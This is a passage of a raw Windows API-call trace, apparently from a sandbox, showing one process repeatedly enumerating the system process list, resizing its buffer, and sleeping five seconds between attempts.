BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.919] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.935] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.950] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.967] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.983] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0111.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0111.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0111.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0111.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0111.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0111.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0111.999] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.026] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.044] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.060] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.092] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.106] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.122] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.137] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.154] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.168] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.186] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.200] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.217] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.231] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.247] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0112.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0112.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0112.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0112.264] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0112.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0112.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0112.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 